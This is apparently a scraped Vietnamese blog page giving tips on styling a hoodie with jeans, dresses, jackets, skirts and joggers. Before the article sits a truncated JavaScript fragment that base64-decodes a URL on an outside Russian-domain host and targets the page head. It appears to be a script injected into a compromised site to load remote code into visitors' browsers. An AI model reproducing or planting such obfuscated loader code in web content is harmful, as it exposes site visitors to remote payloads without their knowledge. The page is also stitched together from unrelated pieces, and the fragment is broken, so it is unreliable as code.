(function(){var a=document.head||document.getElementsByTagName("head")[0],b=atob("aHR0cHM6Ly9hZGlxd2VuZGoudHcxLnJ1Lw==");b+=-1

Cách phối đồ với áo hoodie

Cách phối đồ với áo hoodie có thể tùy thuộc vào phong cách và sự thoải mái cá nhân của bạn. Dưới đây là một số gợi ý để bạn có thể:

1. Phối áo hoodie với quần jeans:

Đây là cách phối đồ cổ điển và dễ dàng. Chọn một chiếc áo đơn giản và phối cùng quần jeans để tạo ra một trang phục thường ngày thoải mái khi phối áo hoodie với quần jeans, bạn có nhiều lựa chọn để tạo ra một trang phục thoải mái và phong cách. Áo hoodie trơn và quần jeans rộng: Tạo ra một phong cách đơn giản và nhẹ nhàng bằng cách chọn một chiếc áo hoodie đơn giản màu đen hoặc trắng cùng với một đôi quần jeans rộng. Hoàn thiện bằng cách thêm một cặp sneakers và một chiếc túi xách nhỏ.
Cách phối đồ với áo hoodie

2. Kết hợp áo hoodie với váy:

Tạo nên sự tương phản thú vị bằng cách kết hợp áo hoodie với váy. Chọn một chiếc áo hoodie phù hợp với váy có thể là áo khoác hoodie dài hoặc áo hoodie crop top. Kết hợp với váy ngắn hoặc váy maxi để tạo nên một trang phục độc đáo và phá cách. Khi kết hợp hoodie với váy, bạn có thể tạo ra một trang phục độc đáo và thời thượng.  Hoodie oversized và váy áo dài: Chọn một chiếc hoodie lớn để tạo nên vẻ ngoài thú vị và tạo sự cân bằng với váy áo dài nữ tính. Bạn có thể chọn điểm nhấn bằng cách phối màu hoặc in hoa trên váy, tạo nên sự phá cách và độc đáo. Hoodie và váy trễ vai: Để tạo nên một outfit năng động và cá nhân, bạn có thể kết hợp hoodie với một chiếc váy trễ vai. Chọn một hoodie có màu sắc tương phản hoặc in hoạt hình để tạo nên điểm nhấn và tăng thêm phong cách cho trang phục.
Cách phối đồ với áo hoodie

3. Lớp áo hoodie dưới áo khoác:

Khi thời tiết lạnh hơn bạn có thể lớp áo hoodie dưới áo khoác hoặc áo vest. Điều này không chỉ tạo nên sự ấm áp mà còn thêm phong cách và tạo lớp độc đáo cho trang phục của bạn. Có thể mang lại cảm giác ấm áp và thoải mái. Áo hoodie thường có một lớp áo khoác dạng áo len bên trong, làm từ chất liệu mềm mại như cotton hoặc polyester để giữ ấm cơ thể. Áo khoác bên ngoài thường được làm từ vải dày hơn, như vải nỉ hoặc vải dù, để tăng cường khả năng chống gió và chống thấm nước. Lớp áo khoác dưới lớp áo mang lại nhiều lợi ích. Đầu tiên, nó giúp bảo vệ cơ thể khỏi gió lạnh và thời tiết khắc nghiệt. Khi bạn mặc lớp áo khoác, bạn có thể kéo lên khóa áo và thắt dây nơ để giữ nhiệt và không cho gió thổi qua. Điều này giữ ấm cơ thể và giúp bạn cảm thấy ấm áp và thoải mái.
Cách phối đồ với áo hoodie

4. Kết hợp áo hoodie với chân váy:

Tạo nên một phong cách nữ tính nhưng cũng vẫn thoải mái bằng cách kết hợp áo hoodie với chân váy. Chọn áo  có màu sắc và kiểu dáng phù hợp với chân váy để tạo nên một trang phục trẻ trung và cá tính.
Cách phối đồ với áo hoodie

5. Kết hợp áo hoodie với quần jogger:

Tạo nên một trang phục thể thao và thoải mái bằng cách kết hợp áo với quần jogger. Phong cách này phổ biến trong thời trang streetwear và rất phù hợp cho những ngày nghỉ dạo phố hoặc thậm chí khi đi chơi.
Cách phối đồ với áo hoodie
Quan trọng nhất hãy luôn tự tin và thoải mái trong việc phối đồ. Khám phá và tạo nên phong cách riêng của bạn với áo hoodie!
Đọc thêm

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *